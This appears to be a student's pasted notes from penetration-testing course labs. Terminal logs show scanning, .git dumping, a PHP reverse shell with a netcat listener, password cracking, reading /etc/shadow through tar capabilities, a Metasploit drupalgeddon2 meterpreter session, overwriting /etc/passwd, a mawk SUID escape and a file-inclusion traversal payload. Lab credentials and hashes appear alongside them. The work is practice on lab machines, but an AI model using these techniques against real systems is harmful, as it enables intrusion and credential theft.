bash: no job control in this shell
bill@b2r:~$ sudo -l
sudo -l
Matching Defaults entries for bill on b2r:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bill may run the following commands on b2r:
(ALL : ALL) NOPASSWD: ALL
bill@b2r:~$ sudo su
sudo su
whoami
root
cd /root
ls
flag
cat flag
flag{WellThatWasEasy}
Lab42: The aim of this exercise is to read 2 flag.txt file. One flag is located in /root/flag.txt and second flag is located in /root/eric/flag.txt.
Rocheston:~$ sudo arp-scan 192.168.0.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.25 08:00:27:07:a0:19 Cadmus Computer Systems
192.168.0.153 08:00:27:0e:2c:c6 Cadmus Computer Systems
Rocheston:~$ sudo dirb http://192.168.0.25
+ http://192.168.0.25/admin.php (CODE:200|SIZE:306)
+ http://192.168.0.25/index.php (CODE:200|SIZE:281)
Rocheston:~$ sudo dirb http://192.168.0.25
Rocheston:~$ sudo git clone https://github.com/internetwache/GitTools.git
Cloning into 'GitTools'...
Rocheston:~$ cd GitTools
Rocheston:~/GitTools$ ls
Dumper Extractor Finder LICENSE.md README.md
Rocheston:~/GitTools$ cd Dumper/
Rocheston:~/GitTools/Dumper$ sudo ./gitdumper.sh http://192.168.0.25/.git/ dest-dir
Rocheston:~/GitTools/Dumper$ cd ../
Rocheston:~/GitTools$ cd Extractor/
Rocheston:~/GitTools/Extractor$ sudo ./extractor.sh ../Dumper/dest-dir ./dest-dir
Rocheston:~/GitTools/Extractor$ cd dest-dir/
Rocheston:~/GitTools/Extractor/dest-dir$ ls
0-3db5628b550f5c9c9f6f663cd158374035a6eaa0
1-cc1ab96950f56d1fff0d1f006821cab6b6b0e249
2-a89a716b3c21d8f9fee38a0693afb22c75f1d31c
Rocheston:~/GitTools/Extractor/dest-dir$ cd 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ ls
admin.php commit-meta.txt index.php
Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ cat admin.php
Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ cd /usr/share/webshells/php/
Rocheston:/usr/share/webshells/php$ sudo nano php-reverse-shell.phpRocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ cd /usr/share/webshells/php/
Rocheston:/usr/share/webshells/php$ sudo nano php-reverse-shell.php
Rocheston:/usr/share/webshells/php$ sudo nc -lvp 1234
listening on [any] 1234 ...
25/10
RCCE Lvl 2
Lab 9: The aim of this exercise is to get the root access and then catch the flag
Lab 8: The aim of this exercise is to find three hidden flags
Rocheston:~$ sudo ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.134 netmask 255.255.255.0 broadcast 192.168.5.255
Rocheston:~$ sudo arp-scan 192.168.5.1-192.168.5.200 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 200 hosts (https://github.com/royhills/arp-scan)
192.168.5.124 08:00:27:07:a0:19 Cadmus Computer Systems
192.168.5.134 08:00:27:90:01:c7 Cadmus Computer Systems
Rocheston:~$ sudo nmap -sC -sV 192.168.5.124
Ports open: 22,80
Rocheston:~$ sudo owasp-zap
We get /loot subdirectory
Rocheston:~$ cd downloads
Rocheston:~/downloads$ ls
1.jpg 2.jpg 3.jpg 4.jpg image.jpeg
Rocheston:~/downloads$ sudo steghide extract -sf 1.jpg
Enter passphrase:
wrote extracted data to "secret.txt".
Rocheston:~/downloads$ sudo steghide extract -sf 2.jpg
Enter passphrase:
wrote extracted data to "emb.txt".
Rocheston:~/downloads$ sudo steghide extract -sf 3.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Rocheston:~/downloads$ sudo steghide extract -sf 4.jpg
Enter passphrase:
wrote extracted data to "loot.pcapng".
Rocheston:~/downloads$ sudo steghide extract -sf image.jpeg
Enter passphrase:
wrote extracted data to "robots.txt".
Rocheston:~/downloads$ sudo cat secret.txt
WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=
Rocheston:~/downloads$ sudo echo "WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=" | base64 -d
You really thought it would be this easy ? Keep digging ! Lots of trolls to defeat.
Rocheston:~/downloads$ sudo cat emb.txt
+[--->++<]>+.++[->++++<]>+.+++++++..[++>---<]>--.++[->++<]>.[--->+<]>+++.-.---------.--[--->+<]>-.+.-.--[->+++<]>-.[->+++++++<]>.++++++.---.[-->+++++<]>+++.+++[->++<]>.[-->+++<]>.+++++++++.+.+.[---->+<]>+++.+++[->++<]>.--[--->+<]>.-----------.++++++.-[--->+<]>--.-[--->++<]>-.++++++++++.+[---->+<]>+++.>+[--->++<]>.>-[----->+<]>-.++[->++<]>..----.-[--->++<]>+.-.--[++++>---<]>.-------------.-[--->+<]>+++.+[-->+<]>+++++.+.++[->+++++<]>.--.+[----->+<]>.--[++>---<]>.+[->++<]>.-[--->++<]>+.--.-[---->+++<]>-.
We go to https://www.splitbrain.org/services/ook to decipher the brainfuck.
Deciphering it from brainfuck to text we get: Well Done ! Your First Flag is V2hhdCBpcyBCYWx1dCA/
Now we use wireshark to open loot.pcapng file. From the HTTP protocols, we are able to find GET and POST request for downloading a file along with the file byte. We sekect the HTTP protocol and from wiresharkm File -> Export Objects -> HTTP we find loot.7z. Save it.
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./7z2john.pl /home/rocheston/downloads/loot.7z > /home/rocheston/downloads/7zloot
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/downloads/7zloot --wordlist:/usr/share/wordlists/rockyou.txt
manchester (loot.7z)
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john ~/downloads/loot/id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt
hello
Rocheston:/pentest/password-recovery/johntheripper$ sudo cat ~/downloads/loot/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPf01eRsS9o4Xaaog8Acmsd8ctkNA/qweGlDVYQqfGISzy/z0Sh3a2SlEVAweLnVKz1mdoKS4LrKnKxw0cR/fe7AChdY6wq/kCodLPCPmzMZQv12RUo1awO8gpuFA4RZdSmvDmtS1220cscm0fdSDrFt2sxNfn65dgPutJg+wMgssxrExzWjp9OR6AaAlB/naarcT28/LIsMh8DeHhOd9vs/Rew6LvX0mWyLJchAzqoMPHOrSaKu/b7YbMFUlJVvrivzBy35qwOdKFuX0Fa5Wg9TWDL9B1VDu+rFV/MTMdEkss+hIvS7Nl04ovplRLSE09TVa8dPUGGzMRVTGKxHON test@mini
Last login: Tue Dec 18 01:33:12 2018 from 192.168.37.1
test@mini:~$ ls
test@mini:~$ cd .ssh
test@mini:~/.ssh$ ls -la
total 24
drwx------ 2 test test 4096 Dec 2 2018 .
drwxr-xr-x 3 test root 4096 Dec 18 2018 ..
-rw-r--r-- 1 test test 391 Dec 2 2018 authorized_keys
-rw------- 1 test test 1766 Dec 2 2018 id_rsa
-rw-r--r-- 1 test test 391 Dec 2 2018 id_rsa.pub
-rwxr-xr-x 1 test test 115 Dec 2 2018 sshscript.sh
test@mini:~/.ssh$ cat sshscript.sh
#!/bin/bash
echo "FInally you got a shell ! Here's a flag for you 5256247262. Let's see where you go from here"
test@mini:/var/www/html/wordpress$ cat wp-config-sample.php | more
/** MySQL database username */
define('DB_USER', 'kuya');
/** MySQL database password */
define('DB_PASSWORD', 'Chrepia##@@!!');
test@mini:/var/www/html/wordpress$ cd
test@mini:~$ ls -la
total 20
drwxr-xr-x 3 test root 4096 Dec 18 2018 .
drwxr-xr-x 4 root root 4096 Dec 2 2018 ..
-rw------- 1 test test 464 Dec 18 2018 .bash_history
drwx------ 2 test test 4096 Dec 2 2018 .ssh
-rw-r--r-- 1 test test 168 Dec 2 2018 .wget-hsts
test@mini:~$ su kaya
No passwd entry for user 'kaya'
test@mini:~$ su kuya
Password:
kuya@mini:/home/test$ find / -perm -4000 2>/dev/null
/bin/ping
/bin/mount
/bin/su
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
kuya@mini:/home/test$ cd
kuya@mini:~$ ls
shadow.tar who_dis.txt
kuya@mini:~$ cat who_dis.txt
Well Done !
BTW this was too easy :D
Here is something for you IL0v3C@f3HaV@nA
kuya@mini:~$ cat .bash_history
cd /home/kuya
chown -R kuya
chown -R kuya /home/kiya
chown -R kuya /home/kuya
su root
cd /home/kuya
cat /etc/shadow
./tar -cvf shadow.tar /etc/shadow
tar -cvf shadow.tar /etc/shadow
which tar
getcap -r / 2>/dev/null
setcap cap_dac_read_search=ep
exit
kuya@mini:~$ export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
kuya@mini:~$ getcap -r / 2>/dev/null
/bin/tar = cap_dac_read_search+ep
kuya@mini:~$ tar -cvf shadow.tar "/etc/shadow"
tar: Removing leading `/' from member names
/etc/shadow
kuya@mini:~$ tar -xvf shadow.tar
etc/shadow
kuya@mini:~$ cat etc/shadow
root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::
kuya@mini:~$ tar cvf shadow.tar /root
tar: Removing leading `/' from member names
/root/
/root/.nano/
/root/M3m3L0rd.txt
/root/.selected_editor
/root/.bash_history
kuya@mini:~$ tar xvf shadow.tar
root/
root/.nano/
root/M3m3L0rd.txt
root/.selected_editor
root/.bash_history
kuya@mini:~$ cd root/
kuya@mini:~/root$ ls
M3m3L0rd.txt
kuya@mini:~/root$ cat M3m3L0rd.txt
You did it !!!!
COngratulations :D
I just hope you had the same fun as I had while making this box.
As this is my first box, please send in your reviews to me on syed.ashhad72@gmail.com (DOn't hack this please Mr Leet)
If you are still reading, you are wasting your time
THere is no flag here.
Seriously Stop
Well I can't help so here is the last one WeasleyIsOurKing
#PeaceOut
24/10
RCCE Lvl 2
Lab 7: To get root access
Rocheston:~$ sudo ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.134 netmask 255.255.255.0 broadcast 192.168.5.255
Rocheston:~$ sudo arp-scan 192.168.5.100-192.168.5.200 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 101 hosts (https://github.com/royhills/arp-scan)
192.168.5.132 08:00:27:60:02:47 Cadmus Computer Systems
192.168.5.153 08:00:27:07:a0:19 Cadmus Computer Systems
Rocheston:~$ sudo nmap -sV -sC 192.168.5.153
Ports open: 22, 80, 111, 8080
Rocheston:~$ sudo msfconsole
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.5.153
rhost => 192.168.5.153
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.5.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39860 bytes) to 192.168.5.153
[*] Meterpreter session 1 opened (192.168.5.134:4444 -> 192.168.5.153:57160 ) at 2023-10-24 09:54:06 -0400
meterpreter > shell
Process 1852 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@billu-b0x:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
www-data@billu-b0x:/var/www/html$ ls -la /etc/passwd
ls -la /etc/passwd
-rwxrwxrwx 1 root root 2606 Jun 10 2018 /etc/passwd
www-data@billu-b0x:/var/www/html$ cat /etc/passwd
cat /etc/passwd
indishell:$6$AunCdsxZ$OBxuMf0a/GqstthT4LEW8RGZxepGL7C3jHMk/IFyhLCTJ/.0fo/9Aa.s134i80z
Create a file and put all passwords in the file
Rocheston:~$ sudo openssl passwd -1 -salt abc pass123
$1$abc$66P0kBoPMsKgk3H5bxZFv/
Rocheston:~$ sudo gedit passwd
Back to msfconsole,
www-data@billu-b0x:/var/www/html$ ^C
Terminate channel 0? [y/N] y
meterpreter > cd /etc
meterpreter > upload /home/rocheston/passwd
[*] uploading : /home/rocheston/passwd -> passwd
[*] Uploaded -1.00 B of 2.48 KiB (-0.04%): /home/rocheston/passwd -> passwd
[*] uploaded : /home/rocheston/passwd -> passwd
meterpreter > shell
Process 2074 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@billu-b0x:/etc$ su indishell
su indishell
Password: pass123
password for indishell: pass123
indishell@billu-b0x:/etc$ sudo -i
sudo -i
root@billu-b0x:~#
To Access proper tty shell enter command “python -c ‘import pty;pty.spawn(“/bin/bash”)’ “
lsb_release -a to identify the kernel version
indishell, this file has all permissions and we can modify it easily.
Lab 6: To gain root privileges and read the flag located at /root/flag.txt
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.134
Rocheston:~$ sudo arp-scan 192.168.0.100-192.168.5.163 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 1344 hosts (https://github.com/royhills/arp-scan)
192.168.5.132 08:00:27:60:02:47 Cadmus Computer Systems
192.168.5.153 08:00:27:07:a0:19 Cadmus Computer Systems
Rocheston:~$ nmap -sC -sV 192.168.5.153 -vv
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 42287/udp status
|_ 100024 1 49362/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Rocheston:~$ sudo dirb http://192.168.5.153
/admin = here we can find notes.txt which contains name and password.
sudo ssh ted@192.168.5.153
enter password - 12345ted123
Enumerate all binaries that have SUID permission
find / -perm -u=s -type f 2>/dev/null
Execute the following commands
mawk 'BEGIN {system("/bin/sh")}' to get the shell
id
cd /root
ls
cat flag.txt
OSINT:
OSINT framework
Resources:
- whois
- checkusernames
- haveibeenpwned
- infospace
Usage
cd /rcce/whatweb/
runscript
./whatweb paultan.org
./whatweb juggybank.com
CVE to find Vulnerabilities
Tools learned:
/rcce/FinalRecon
runscript
cat finalrecon.py
python3.7 finalrecon.py --full http://juggybank.com
-
exporting to: /home/rocheston/.local/share/finalrecon/dumps/juggybank.com.txt
-
go to file manager, type in the directory
-
desktop>desktop1>file manager
- /home/rocheston/.local/share.finalrecon/dumps
- click juggybank.com.txt
9/9
Tools learned:
-
theHarvester
- cd rcce/theHarvester
-
theHarvester.py
- cat theHarvester.py
-
./theHarvester.py -d petronas -b linkedin
-
shodan.io (paid search engine)
-
kamerka.io (good for US)
-
archive service
-
www.archive.org
-
creepy geolocation - geocreepy.com
-
identify geolocation based on photos
- windows 7 in rose.
-
right click >run program > virtualbox
-
geocreepy.com on rose virtualbox, install 32bit version
- open cree.py
- new project name: locate SAJAT
- keywords: sajat
-
description: hired by special branch to locate sajat
- email trackers.
-
www.hubspot.com
-
gmail tracker
-
cyberscanner.net/gmail
-
in terminal, arp-scan –help
-
arp-scan 10.0.0.1-10.0.0.254
- nmap -v -A www.juggybank.com
11/9
Tools learned:
Question in exam: password spraying
-
caldera
-
greynoise.io
-
https://www.shadowserver.org/
-
https://cybermap.kaspersky.com/
-
http://threatmap.checkpoint.com/
-
cd /usr/share/nmap/scripts/
-
git clone https://github.com/scipag/vulscan.git
-
ln -s
pwd/scipag_vulscan /usr/share/nmap/scripts/vulscan
13/9
Tools learned:
-
Cmseek tool web app module 4
-
python3 cmseek.py -u website
18/9
Topics:
Exam Question: Explain complexity of code.
-
file inclusion: localhost:2063/?page=../../../../../../etc/passwd or vnc.conf
-
haja.me/tools/cmd.txt
-
localhost:90/jsfuck
-
sqlmap